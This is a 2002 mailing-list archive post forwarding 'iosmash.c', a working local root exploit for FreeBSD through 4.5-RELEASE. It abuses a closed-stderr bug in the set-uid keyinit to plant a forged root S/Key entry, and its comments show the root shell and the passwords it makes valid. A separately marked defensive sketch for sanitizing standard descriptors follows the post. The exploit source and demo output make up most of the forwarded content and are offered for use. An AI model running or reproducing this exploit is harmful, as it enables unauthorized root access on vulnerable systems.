[luau] FreeBSD Local Root exploit... it works ;)

R. Scott Belford sctinc at flex.com
Tue Apr 23 11:56:20 PDT 2002


I did not think *bsd distros had such holes.  How long does it usually 
take the team to patch them?

scott

On Tuesday, April 23, 2002, at 08:01  AM, cpaul at telemetrybox.org wrote:

> ----- Forwarded message from Joshua Thayer <joshua at craigslist.org> -----
>
> Delivered-To: epsas at localhost.pdchawaii.com
> Envelope-to: cpaul at telemetrybox.org
> Date: Tue, 23 Apr 2002 10:57:16 -0700 (PDT)
> From: Joshua Thayer <joshua at craigslist.org>
> To: <cpaul at telemetrybox.org>
> Subject: cheers (fwd)
> X-Return-Path: joshua at craigslist.org
>
>
>
> ---------- Forwarded message ----------
> Date: Tue, 23 Apr 2002 10:42:49 -0700 (PDT)
> From: Eric Scheide <scheide at craigslist.org>
> To: Joshua Thayer <joshua at craigslist.org>
> Subject: cheers (fwd)
>
>
>
> --
> Eric Scheide, scheide at craigslist.org
> Chief Technology Officer
>
> ---------- Forwarded message ----------
> Date: Mon, 22 Apr 2002 23:24:08 -0700
> From: KF <dotslash at snosoft.com>
> To: bugtraq <bugtraq at securityfocus.org>, vuln-dev
> <vuln-dev at security-focus.com>
> Subject: cheers
>
> http://www.phased.home.ro/iosmash.c
>
> -KF
>
>
>
> /*
>   phased/b10z
>   phased at snosoft.com
>   23/04/2002
>
>   stdio kernel bug in All releases of FreeBSD up to and including 
> 4.5-RELEASE
>   decided to make a trivial exploit to easily get root :)
>
>> id
>   uid=1003(phased) gid=999(phased) groups=999(phased)
>> ./iosmash
>   Adding phased:
>   <--- HIT CTRL-C --->
>> su
>   s/key 98 snosoft2
>   Password:MASS OAT ROLL TOOL AGO CAM
>   xes#
>
>   this program makes the following skeys valid
>
>   95: CARE LIVE CARD LOFT CHIC HILL
>   96: TESS OIL WELD DUD MUTE KIT
>   97: DADE BED DRY JAW GRAB NOV
>   98: MASS OAT ROLL TOOL AGO CAM
>   99: DARK LEW JOLT JIVE MOS WHO
>
>   http://www.snosoft.com
>   cheers Joost Pol
> */
>
> #include <stdio.h>
> #include <unistd.h>
>
> int main(int argc, char *argv[]) {
> 	while(dup(1) != -1);
> 	close(2);
> 	execl("/usr/bin/keyinit",
> 	"\nroot 0099 snosoft2	6f648e8bd0e2988a     Apr 23,2666 01:02:03\n");
> }
>
>
>
> ----- End forwarded message -----
> _______________________________________________
> LUAU mailing list
> LUAU at videl.ics.hawaii.edu
> http://videl.ics.hawaii.edu/mailman/listinfo/luau
>
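
An added example, not part of the original post or of FreeBSD's own fix: the forwarded program closes descriptor 2 before executing a set-uid binary, so the first file that binary opens lands on the stderr slot. The sketch below shows the defensive check a privileged program can run at startup; `sanitize_stdio` and `next_fd_with_stderr_closed` are hypothetical names, and `/dev/null` stands in for a sensitive file.

```c
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>

/* Hypothetical helper: make sure descriptors 0, 1 and 2 are open before a
 * privileged program opens anything else. Returns how many it had to point
 * at /dev/null, or -1 on error. */
int sanitize_stdio(void)
{
    int repaired = 0;
    for (int fd = 0; fd <= 2; fd++) {
        if (fcntl(fd, F_GETFD) != -1)
            continue;                      /* already open */
        if (errno != EBADF)
            return -1;
        int nfd = open("/dev/null", O_RDWR);
        if (nfd != fd) {                   /* open() must return the lowest free slot */
            if (nfd != -1)
                close(nfd);
            return -1;
        }
        repaired++;
    }
    return repaired;
}

/* Constructed demo: recreate the "started with fd 2 closed" state in-process
 * and return the descriptor number the next open() receives. */
int next_fd_with_stderr_closed(int harden)
{
    int saved = dup(2);                    /* keep the real stderr */
    if (saved == -1)
        return -1;
    close(2);
    int ok = !harden || sanitize_stdio() != -1;
    int fd = ok ? open("/dev/null", O_WRONLY) : -1;  /* stands in for a sensitive file */
    if (fd != -1)
        close(fd);
    dup2(saved, 2);                        /* restore stderr */
    close(saved);
    return fd;
}

int main(void)
{
    printf("unhardened: next open() gets fd %d\n", next_fd_with_stderr_closed(0));
    printf("hardened:   next open() gets fd %d\n", next_fd_with_stderr_closed(1));
    return 0;
}
```

Without the check the stand-in file is handed descriptor 2, so anything the program later writes to stderr would go into it; with the check the file gets a descriptor above 2.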



